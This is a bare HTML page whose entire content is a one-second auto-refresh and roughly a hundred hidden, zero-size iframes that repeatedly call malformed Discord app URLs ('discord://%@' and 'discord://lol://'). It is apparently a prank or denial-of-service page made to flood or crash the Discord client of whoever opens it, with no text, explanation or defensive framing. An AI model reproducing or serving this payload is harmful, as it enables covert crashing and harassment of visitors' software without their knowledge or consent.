<html> 
 <head>
  <meta http-equiv="refresh" content="1">
</head> 
<body>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://%@" width="0" height="0" frameborder="0"></iframe>
<iframe src="discord://lol://" width="0" height="0" frameborder="0"></iframe>
</body>
</html>
